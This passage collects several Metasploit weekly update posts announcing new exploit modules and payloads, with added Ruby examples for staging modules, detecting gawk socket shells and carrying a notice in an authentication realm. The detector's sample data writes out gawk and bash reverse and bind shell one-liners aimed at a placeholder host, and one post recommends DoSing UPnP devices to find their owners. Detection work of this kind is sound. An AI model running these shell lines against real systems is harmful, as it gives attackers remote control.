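To make the "you must declare what sort of module it is in the path" rule concrete, here is an added helper script, written for this page rather than taken from Metasploit, that stages a third-party module under $HOME/.msf4/modules and works out the reference name msfconsole will give it. The type-directory-to-refname mapping (exploits/ becomes exploit/, and so on) is how the loader derives names; the "looks like a module" check, the temp HOME and the demo file name are this example's own choices.

```ruby
# Added example, not Metasploit code: stage an out-of-tree module under
# $HOME/.msf4/modules and work out the reference name msfconsole gives it.
# The loader infers the module type from the first directory below
# modules/, so that component is mandatory; the next one ("test" here)
# is free-form.
require 'fileutils'
require 'pathname'

# Directory name on disk => prefix used in "use <refname>".
TYPE_PREFIX = {
  'auxiliary' => 'auxiliary',
  'exploits'  => 'exploit',
  'post'      => 'post',
  'payloads'  => 'payload',
  'encoders'  => 'encoder',
  'nops'      => 'nop'
}.freeze

def modules_root(home)
  File.join(home, '.msf4', 'modules')
end

# Cheap sanity check before copying: a module file declares a class that
# inherits from something under Msf:: (e.g. Metasploit3 < Msf::Auxiliary).
def looks_like_module?(src)
  File.foreach(src).any? { |l| l =~ /\A\s*class\s+\w+\s*<\s*Msf::/ }
end

# Copy src into ~/.msf4/modules/<type>/<subdir>/ and return the new path.
def install_module(src, type:, subdir: 'test', home: Dir.home)
  raise ArgumentError, "unknown module type #{type.inspect}" unless TYPE_PREFIX.key?(type)
  raise ArgumentError, 'subdir must be a single path component' if subdir.empty? || subdir =~ %r{[/\\]|\A\.\.?\z}
  raise ArgumentError, "#{src} does not look like a Metasploit module" unless File.extname(src) == '.rb' && looks_like_module?(src)

  dest_dir = File.join(modules_root(home), type, subdir)
  FileUtils.mkdir_p(dest_dir)
  dest = File.join(dest_dir, File.basename(src))
  FileUtils.cp(src, dest)
  dest
end

# Reference name msfconsole will use for a file under the modules root,
# e.g. .../modules/auxiliary/test/foo.rb => "auxiliary/test/foo".
def refname_for(path, home: Dir.home)
  rel = Pathname.new(path).relative_path_from(Pathname.new(modules_root(home))).to_s
  type, rest = rel.split('/', 2)
  raise ArgumentError, "#{path} is not below a module type directory" unless TYPE_PREFIX[type] && rest
  "#{TYPE_PREFIX[type]}/#{rest.sub(/\.rb\z/, '')}"
end

if __FILE__ == $PROGRAM_NAME
  require 'tmpdir'
  Dir.mktmpdir do |home| # throwaway HOME so the demo touches nothing real
    src = File.join(home, 'demo_scanner.rb') # constructed stand-in for a downloaded module
    File.write(src, "class Metasploit3 < Msf::Auxiliary\nend\n")
    dest = install_module(src, type: 'auxiliary', home: home)
    puts "installed #{dest}"
    puts "use #{refname_for(dest, home: home)}"
  end
end
```

Run it without arguments for the self-contained demo, or call install_module with your real home directory once you have read the module's commit history as suggested above; the type check is what stops a file from landing somewhere msfconsole will silently ignore.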
Naturally, your mileage may vary, and there is certainly no guarantee that these modules are safe and appropriate for your network, but hey, stable is for suckers!

Heavy-handed UPnP Mitigation

Hey, remember that time HD Moore talked about all the zillions of UPnP devices that have broken implementations and are vulnerable to remote exploitation? Yeah, that was pretty fun. Of course, it's less funny if you are responsible for some of these devices in your network. Is the ownership of these devices in your network unclear? Are they business critical, or not? Sometimes, it's hard to tell.

In my more Lawful Evil moments, it occurs to me that pretty much the fastest way to ferret out ownership of a device is to kick it offline and then find out who squawks. To that end, we have a Denial of Service module that kicks MiniUPnP 1.0 devices offline by exercising CVE-2013-0229, thanks to community contributor Dejan Lukan's implementation of HD's vulnerability discovery.

DoSes certainly can attract attention to a problem implementation. If the device is important enough to keep online, it's probably important enough to protect through some kind of mitigating strategy. Should you really DoS critical industrial control equipment that happens to have a single-packet kill vulnerability? Maybe the better question to ask is, "Is it better to wait for a bad guy to knock this industrial control gear offline on his schedule, or should I do it on my schedule?" Something to think about, anyway.

GNU AWK Bind and Reverse Shells

Once upon a time, the advice to system administrators hardening DMZ-based servers was to yank useful developer tools from those machines, since post-compromise, an attacker could use them to extend control. What this meant, at the time, was that you wouldn't want to have gcc or some other compiler installed on your web server, because you don't want to allow attackers to compile shells and backdoors and stuff like that locally. You'd also want to remove (or at least limit) interpreters like Perl or Python, for largely the same reasons.

I'm not entirely convinced that this is realistic advice; it would be difficult for a system administrator to perform job functions without some kind of programming help. And in this day and age of DevOps, where configuration management is increasingly the job of interpreted languages, the benefits of stripping system tools off a server may just not stack up to the cost of not having them there when you need them legitimately.

That all said, if you happen to run into a CentOS / RedHat based system that is configured by a paranoid, you might want to check if GNU awk is installed (as it is by default). If so, you could leverage this particular flavor of awk and use its built-in socket capabilities to open either a bind shell or reverse shell, thanks to the two new payloads provided by community contributors Roberto Soares and Ulisses Castro. It's at the very least novel, and may avoid IPS/IDS string checkers that are looking for the more traditional Perl and bash-based sockets. And hey, is there really a good reason why I need to be able to bind to a socket with just awk?

New Modules

We've got seven new Metasploit modules this week, not counting the aforementioned AWK payloads. Enjoy!

Exim and Dovecot Insecure Configuration Command Injection by juan vazquez, Unknown, and eKKiM exploits OSVDB-93004
Java Applet Driver Manager Privileged toString() Remote Code Execution by juan vazquez and James Forshaw exploits ZDI-13-076
Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow by sinn3r and h1ch4m exploits OSVDB-93754
Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability by Andrea Micalizzi (aka rgod) and steponequit exploits ZDI-13-087
MiniUPnPd 1.4 Denial of Service (DoS) Exploit by hdm and Dejan Lukan exploits CVE-2013-0229
Novell Zenworks Mobile Device Managment Admin Credentials by Andrea Micalizzi (aka rgod) and steponequit exploits CVE-2013-1081
SevOne Network Performance Management Application Brute Force Login Utility by Karn Ganeshen

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.
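The defensive counterpart to the awk payloads discussed in this update: gawk reaches the network through the documented special files /inet/tcp/LPORT/RHOST/RPORT (also /inet/udp, /inet4, /inet6), normally driven with the |& coprocess operator, which is exactly why a string check tuned for Perl Socket or bash /dev/tcp never fires on them. The following detector is an added example written for this page, not one of the Metasploit payloads or a Rapid7 rule; the command lines it scans are constructed, and the hit format is this example's own.

```ruby
# Added example, not one of the Metasploit payloads: detection logic for
# gawk's built-in sockets, meant to run over process command lines from
# auditd, shell history or EDR telemetry.
#
# gawk socket special file: /inet[46]?/PROTO/LPORT/RHOST/RPORT
#   LPORT 0  => outbound connection to RHOST:RPORT (reverse shell shape)
#   LPORT >0 => listener on LPORT (bind shell shape)
SOCKET_FILE = %r{/inet[46]?/(?<proto>tcp|udp)/(?<lport>\d+)/(?<rhost>[^/\s"']+)/(?<rport>\d+)}
AWK_CMD     = /\b(?:g|m|n)?awk\b/

# Constructed sample telemetry (not real captures). Lines 1 and 2 are the
# shapes to catch; 3 is legitimate awk; 4 is a bash socket (a different
# signature's job); 5 names the special file but never runs awk.
SAMPLE_LINES = [
  %q{gawk 'BEGIN{s="/inet/tcp/0/203.0.113.5/4444";while((s|&getline c)>0){c|&getline r;print r|&s}}'},
  %q{awk 'BEGIN{l="/inet/tcp/4444/0/0";while(1){l|&getline c;c|&getline r;print r|&l}}'},
  %q{awk -F: '$3>=1000{print $1}' /etc/passwd},
  %q{bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'},
  %q{cat /inet/tcp/0/203.0.113.5/4444}
].freeze

# Interpret one /inet special file the way gawk does.
def classify(match)
  lport = match[:lport].to_i
  {
    proto: match[:proto],
    kind:  lport.zero? ? :reverse : :bind,
    lport: lport,
    rhost: match[:rhost],
    rport: match[:rport].to_i
  }
end

# One hit per /inet socket on a line that also invokes an awk.
# `coprocess` records whether the |& operator is present, i.e. the line
# both reads and writes the socket rather than merely touching the path.
def scan_for_awk_sockets(lines)
  hits = []
  lines.each_with_index do |line, idx|
    next unless line =~ AWK_CMD
    line.to_enum(:scan, SOCKET_FILE).each do
      hits << classify(Regexp.last_match).merge(line_no: idx + 1, coprocess: line.include?('|&'))
    end
  end
  hits
end

if __FILE__ == $PROGRAM_NAME
  scan_for_awk_sockets(SAMPLE_LINES).each do |h|
    puts "line #{h[:line_no]}: awk #{h[:kind]} #{h[:proto]} lport=#{h[:lport]} peer=#{h[:rhost]}:#{h[:rport]} coprocess=#{h[:coprocess]}"
  end
end
```

Pair it with whatever you already run for Perl and bash sockets rather than replacing them; the point of the awk payloads is that each interpreter needs its own signature.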

Weekly Update: Apache Struts Exploit, Android Meterpreter, and New Payloads

Apache Struts Exploit

This week's update includes an exploit for a pretty recent vulnerability in Apache Struts, thanks to community contributor Richard @Console Hicks. The struts_include_param module exercises the vulnerability described at OSVDB 93645, disclosed on May 23, 2013, a bare two weeks ago, and originally discovered by Eric Kobrin and Douglas Rodrigues.

The reason why I bring this up is not just because it's a solid exploit for a recent vulnerability (it is), but also because it illustrates, to a small extent, the Metasploit philosophy of disclosing working, tested exploits pretty much as soon as vulnerabilities are made public.

If you are bothered by this stance, then maybe it's time to drag out a dusty old security meme: Defense in Depth. I know for sure there are IT operations folks out there who believe that there is absolutely nothing they can do in the face of zero-day vulnerabilities. This is a horrible, horrible place to be. The fact is, there are volumes and volumes written on defense in depth: you can segment your network, instrument your servers, keep an eye on egress rules, and generally make life a huge hassle for would-be attackers armed with zero (or 14, or 30) day vulnerabilities that you haven't patched against yet.

I'm heartened that Google appears to have taken a similar stance on this, with their announced policy of disclosing active, in-the-wild exploits in the interest of public safety. An Internet giant like Google taking an anti-secrecy stance like this is pretty powerful, and I'm looking forward to the next few weeks of vulnerability disclosures from them.

Android Meterpreter

Once, a few weeks back, a fellow named timwr popped into the Metasploit IRC channel on Freenode and complained, rather rudely I might add, "How come there's no Android Meterpreter?" Egypt immediately responded with something along the lines of, "because you haven't written it yet." That, my friends, is how new ports of Meterpreter are made.

Timwr, mihi, and Egypt got together over the next several weeks, and as of May 28 or so, we now have a pretty decent Meterpreter app for Android. Expect a much more whiz-bang blog post on this soon, but in the meantime, it's pretty fun to mess around with it now. We don't have much in the way of Android exploits right now, of course, but that brings me to another topic.

New Payloads

This week's update also includes new payloads for ARM and 64-bit Windows. We've three new payloads, all from community contributor @dcbz32, to create reverse TCP and reverse HTTPS connections, as well as a simple shell payload. Hooray, our ARM support is getting more robust all the time; now if only we could convince people to start writing up decent Android and embedded system exploits...

In addition, we also have a 64-bit Windows payload for reverse HTTPS, from community contributor agix. This has been a long standing feature request, because while in most cases, 32-bit payloads work just fine on 64-bit platforms, this isn't the case 100% of the time. While this payload works like a champ on Windows 7 and related platforms, it most notably is not supported for Windows 8 targets. Something funny is going on in Win8-land specifically, and it's proving squirrelly to nail down. So, good job to Microsoft for making post-exploit development a little bit harder on their latest platform (: . If you happen to have expertise in this area, we'd love to get your input on putting something solid together for Win8 reverse HTTPS connections as shellcode; ideally, we can end up with one payload for both 64-bit platforms.

New Modules

We've five new modules this week, including the Apache Struts exploit. Check 'em below.

Memcached Remote Denial of Service by Gregory Man exploits CVE-2011-4971
Apache Struts includeParams Remote Code Execution by Douglas Rodrigues, Eric Kobrin, and Richard Hicks exploits CVE-2013-1966
Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-094
Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow by Spencer McIntyre exploits CVE-2013-3563
CouchDB Login Utility by espreto

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: The Nginx Exploit and Continuous Testing

Nginx Exploit for CVE-2013-2028

The most exciting element of this week's update is the new exploit for Nginx which exercises the vulnerability described by CVE-2013-2028. The Metasploit module was written by Metasploit community contributors hal and saelo, and exploits Greg MacManus's bug across a bunch of versions on a few pre-compiled Linux targets. We don't often come across remote, server-side stack buffer overflows in popular software, so when we do, it's kind of a big deal. This is a big deal vulnerability, and hopefully, Internet-facing ops guys all over the world have already fallen all over themselves to fix this. And yet, recall Jeff Jarmoc's recent findings on the Rails vulnerability, where this critical, remote code execution vulnerability continues to be exploited in the wild, five months after disclosure. Now, apply that to what's likely going to happen with this bug, a mere three weeks out from disclosure. Yeah, it's not pretty. If you're running Nginx, and you haven't applied the patch or the workaround, you are asking for trouble. If you think you've applied the patch or the workaround, or if you don't know if you're running a vulnerable version of Nginx or not, you can check your defensive posture with this Metasploit module.

Jettisoning old tests

The update this week also brings a slightly slimmed down version of Metasploit. Way back when, we shipped a couple hundred "unit tests" to exercise some core functionality. While it's true that these testing scripts used the default 'test/unit' library that ships with Ruby, we have since moved on to more complete, thorough testing using Rspec and running every commit through Travis-CI. Also, these old tests haven't been touched, literally, this decade, so bitrot has set in pretty hard. Few of these tests still work, so it was best to just toss them and move on with rspec.

If you're of a mind to fix or extend core Metasploit functionality, when you write your fix, it would be delightful if you paid attention to the spec/ subdirectory. You can learn a lot from the several hundred example tests that are already there. Being able to prove that your patch actually fixes the problem described makes reviewing your pull request move along much, much faster. Tests can also do double duty as documentation of what you're expecting to happen. In fact, if you were to write fixes and features following TDD (test-driven design), you'd do something like this:

1. Write an rspec test that fails, because it's hitting a bug or exercising an unwritten feature. Commit that.
2. Write your fix or feature.
3. Run your rspec test again, and see it succeed.
4. Do a little dance and commit that, and send up a pull request.

You will probably uncover more of your feature or fix as you're writing; that's okay, just add another test before you start writing a fix. In this day and age of split windows and featureful IDEs, there's really no reason to avoid this kind of back-and-forth development.

If you want to recover the old tests, it's as simple as checking out Metasploit Framework's unstable branch on GitHub, and running a quick find . -name '*.u[ts].rb' (quote the pattern so your shell doesn't expand it first) to locate them. About the only reason I can think of to do this is to port the tests that (used to) cover some core Rex, Railgun, and Meterpreter functionality. In fact, doing just that would make a fine summer pastime for you infosec kids who are off for the next couple months.

Testing Metasploit modules is a little different. Ask anyone who knows Ruby pretty well, and they'll agree that Metasploit modules are a little... weird. They also tend to require some very specific, not-very-mockable environmental elements (like functional targets configured with specific vulnerabilities), so the usual rspec route doesn't work out too well with them. We're working on open sourcing some of our QA practices on how to test those as well, though, so stay tuned and keep an eye on the test/modules directory. A bunch of excitement should be landing there soon.

New Modules

In addition to the Nginx vulnerability, we've got new modules for Firefox, IBM SPSS, and Adobe Reader.

Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow by Greg MacManus, hal, and saelo exploits CVE-2013-2028
Firefox 17.0.1 Flash Privileged Code Injection by sinn3r, Marius Mlynski, and joev exploits CVE-2013-0757
IBM SPSS SamplePower C1Tab ActiveX Heap Overflow by juan vazquez and Alexander Gavrun exploits CVE-2012-5946
AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass by juan vazquez and Felipe Andres Manzano exploits CVE-2013-2730

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: 4.6.1, ColdFusion Exploit, and SVN Lockdown

Metasploit 4.6.1 Released

This week's update bumps the patch version of Metasploit to 4.6.1 (for installed versions of Metasploit). The major change here is the ability to install Metasploit on Windows 8 and Windows Server 2012. That meant we had to fiddle with the installer and a few of Metasploit Pro's dependencies to get that all working correctly, and that led to skipping last week's release so we could be sure all the moving parts lined up correctly.

This release also fixes a few minor issues in Metasploit Pro that affected a handful of users -- you can read up on what exactly has changed in the release notes. As usual, it's a little bigger than you might expect from your typical update, given the changes in the installer code, so give it a couple extra minutes to download and do its update thing.

Intern Found!

If you've been watching this space, you'll know that we've been on the prowl for a summer intern. Welp, the search is over -- we've managed to pick up a well-qualified college student who has a strong background in both IT ops and exploit dev. If you have Pull Requests in the metasploit-framework backlog, or aging bugs in the Redmine Issue Tracker, then you should expect to meet him soon as he validates your pulls and bugs and gets your stuff back on track (or mercilessly axed).

Of course, this sort of backlog validation doesn't have to land in a paid intern's lap. If you're looking to beef up your resume, know a thing or two about IT security and Ruby, and are handy with VMware or Vagrant, you are more than welcome to throw in as well. We can always use extra validation inputs to our bugs and PR's. Even if you're not here in the Mazes of Metasploit, fixing bugs and getting your name attached to Metasploit commits is a pretty decent reference all by itself, paid or not.

SVN is Still Mostly Dead

This week we've locked up our SVN server at http://www.metasploit.com/svn with a pretty unguessable username and password. This is to discourage people from following the piles of pre-2011 documentation that's out there. The SVN lockdown is described at http://r-7.co/MSF-SVN in more detail, but the moral of the story is, don't even try to guess the password, and don't try to use your e-mail password or GitHub password or anything like that. The whole point of this new behavior is to merely transmit the instructions to move to Git in the WWW-Authenticate header.

New Modules

We've a fairly huge bucket full of exploits and auxiliary modules this week. Sixteen total, mostly around our 2013 theme of home access points and SAP installations. We're also shipping Juan's 1Day exploit for Mutiny appliances this week, as well as an exe dropper for SSH sessions from Spencer McIntyre and Brandon Knight.

Oh, and did you hear about the Linode compromise? Part of the incident centered around recent ColdFusion bugs. Now, I'm sure ColdFusion is a delightful language to work in and if you're a CFM artiste, you probably have a ball every day working on your codebase. That said, it's not a super popular language here in the 21st Century. This usually means that you're stuck with legacy-flavored security bugs, like the directory traversal vulnerability exercised by Hack The Planet and ported to Metasploit by Wei @_sinn3r Chen.

D-Link DIR615h OS Command Injection by juan vazquez and Michael Messner exploits OSVDB-90174
Linksys WRT160nv2 apply.cgi Remote Command Injection by juan vazquez and Michael Messner exploits OSVDB-90093
Mutiny 5 Arbitrary File Upload by juan vazquez exploits CVE-2013-0136
Kloxo Local Privilege Escalation by juan vazquez and HTP
SAP Management Console OSExecute Payload Execution by juan vazquez and Chris John Riley
SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution by nmonkee
SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution by nmonkee
SSH User Code Execution by Brandon Knight and Spencer McIntyre exploits CVE-1999-0502
ERS Viewer 2011 ERS File Handling Buffer Overflow by juan vazquez and Parvez Anwar exploits CVE-2013-0726
DLink DSL 320B Password Extractor by Michael Messner exploits OSVDB-93013
Mutiny 5 Arbitrary File Read and Delete by juan vazquez exploits CVE-2013-0136
SAP SOAP EPS_DELETE_FILE File Deletion by Alexey Sintsov and nmonkee exploits OSVDB-74780
ColdFusion 'password.properties' Hash Extraction by sinn3r and HTP exploits OSVDB-93114
CouchDB Enum Utility by espreto
SAP CTC Service Verb Tampering User Management by Alexandr Polyakov and nmonkee
SAP SMB Relay Abuse by Alexey Tyurin and nmonkee
SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure by nmonkee

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.
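On the SVN lockdown described in this update: the mechanism is that a 401 response carries its realm as an RFC 7235 quoted-string inside WWW-Authenticate, and most Basic-auth clients (the svn command line included) print that realm before they prompt, so it is the one place a retired endpoint can leave a human-readable note. The following is an added illustration written for this page, not Rapid7's actual server configuration; the notice text is made up, and the page never gives the real one. The client-side check at the end is the practitioner's half of the advice above: never send a stored password to a realm you did not expect.

```ruby
# Added example, not Rapid7's SVN server configuration: carry a notice in
# the Basic-auth realm of a 401 and read it back on the client side.
# The notice text is invented for this illustration.

MIGRATION_NOTICE = 'SVN is retired. Read http://r-7.co/MSF-SVN and git clone from GitHub. Do not enter a password.'

# Build the 401. The realm is a quoted-string, so CR/LF is collapsed
# (no header injection from the notice) and backslash / double quote are
# escaped as RFC 7235 requires.
def challenge_response(notice = MIGRATION_NOTICE)
  realm = notice.gsub(/[\r\n]+/, ' ').gsub(/["\\]/) { |c| "\\#{c}" }
  [
    'HTTP/1.1 401 Unauthorized',
    "WWW-Authenticate: Basic realm=\"#{realm}\"",
    'Content-Length: 0',
    'Connection: close',
    '',
    ''
  ].join("\r\n")
end

# Client side: pull the realm out of a 401 (nil for anything else),
# undoing the quoted-string escapes.
def realm_from(response)
  status, *headers = response.split(/\r?\n/)
  return nil unless status =~ %r{\AHTTP/1\.[01] 401\b}
  auth = headers.find { |h| h =~ /\Awww-authenticate:/i }
  return nil unless auth
  m = auth.match(/realm="((?:[^"\\]|\\.)*)"/i)
  m && m[1].gsub(/\\(.)/, '\1')
end

# The check a credential helper should make before replaying a stored
# password: the realm must be the one the credential was saved for.
def should_send_credentials?(response, expected_realm)
  realm_from(response) == expected_realm
end

if __FILE__ == $PROGRAM_NAME
  resp = challenge_response
  puts resp
  puts "client sees realm: #{realm_from(resp)}"
  puts "replay saved 'Metasploit SVN' credentials? #{should_send_credentials?(resp, 'Metasploit SVN')}"
end
```

A client that only matches on host would happily send its old credentials to the locked-down URL; keying the stored secret on the realm as well is what turns the notice into a guard rather than just a message.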

Weekly Update: Pull Request Wrangling

Pull Requests: Want to help?

Metasploit has a first world problem: We get so much code from contributors out in the world, it gets hard to keep up. Most open source projects aren't popular enough to warrant more than three or four contributors, total. Metasploit has over two hundred, last I checked. We're no Rails (those guys have over 2,000 contributors), but for security software, that's not too bad.

The problem is, our backlog of outstanding pull requests (PRs) is steadily increasing, and now we're floating about a hundred outstanding pull requests. Since Metasploit is fundamentally a communal effort, I'm hopeful that you generous folks out there in Open Source Land can maybe help us take a bite out of this backlog.

First off, check out the new Landing a Pull Request guide. While you might think that this guide is meant only for Rapid7 employees, it's not. The power of GitHub as a source control management system lies in the ability for literally anyone to contribute fixes in a distributed way. Let me quote from the Collaboration between Contributors section:

"If Alice knows a solution to Bob's pull request that Juan pointed out, it is easy for Alice to provide that solution by following [this procedure]. Git blame will still work correctly, commit histories will all be accurate, everyone on the pull request will be notified of Alice's changes, and Juan doesn't have to wait around for Bob to figure out how to use send_request_cgi() or whatever the problem was."

What this means is that if you see something languishing in our pull queue, and you think you can help move things along, go for it! Most of the time, PRs don't get landed due to a lack of verification or testing. So, while some old PR might get solved with some bugfixes, more likely, what we really need is some solid verification procedure to prove that the PR actually works. Even better, for non-module PRs, would be some rspec tests added to the outstanding PR. Merely +1'ing a PR isn't likely to be very helpful, but squeaky wheels do get greased. The point is, the opportunities to collaborate on advancing the state of the art in open source security development really are there for the taking.

Intern Sought

Speaking of contributing, summer is approaching, and that means it's time to start trolling (trawling?) for interns. We have a pretty formidable job description up, but if you're reading this blog, you probably already have some deep and abiding interest in open source security software, so feel free to pop your resume off to me at todb at metasploit dot com. If you already live here in Austin, then hooray for you, since this internship requires a fair amount of in-person showing up to the office. If you already have contributed code to Metasploit or some other open source project, then you are already way ahead of the game and I would be very interested in talking to you.

If interning isn't your thing, but you know an enterprising college student who might be a good fit, give them the shortlink: http://r-7.co/MSF-INTERN.

Armitage and MSFGui

Finally, as mentioned in the Metasploit 4.6.0 release notes, we've removed the two alternate Java front ends, Armitage and MSFGui, from Metasploit's main distributions. Those projects, run by Raphael @armitagehacker Mudge and Matthew @scriptjunkie Weeks, respectively, are now being distributed separately from the framework source repository. You can track them at http://www.fastandeasyhacking.com/manual (for Armitage) and http://www.scriptjunkie.us/msfgui/ (for MSFGui). So, if you are sitting on a source checkout of Metasploit and you find that your Java client doesn't work any more, that's probably why. You can get your install back in shape by just fetching from upstream, direct from those guys.

New Modules

We've got four new modules this week. We've been busy preparing for conference season, so module throughput has been a little slower than usual.

MediaWiki SVG XML Entity Expansion Remote File Access by juan vazquez, Christian Mehlmauer, and Daniel Franke exploits OSVDB-92490
Netgear DGN2200B pppoe.cgi Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-90320
Java Applet Reflection Type Confusion Remote Code Execution by juan vazquez and Jeroen Frijters
Free Float FTP Server USER Command Buffer Overflow by D35m0nd142 and Doug Prostko exploits OSVDB-69621

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.
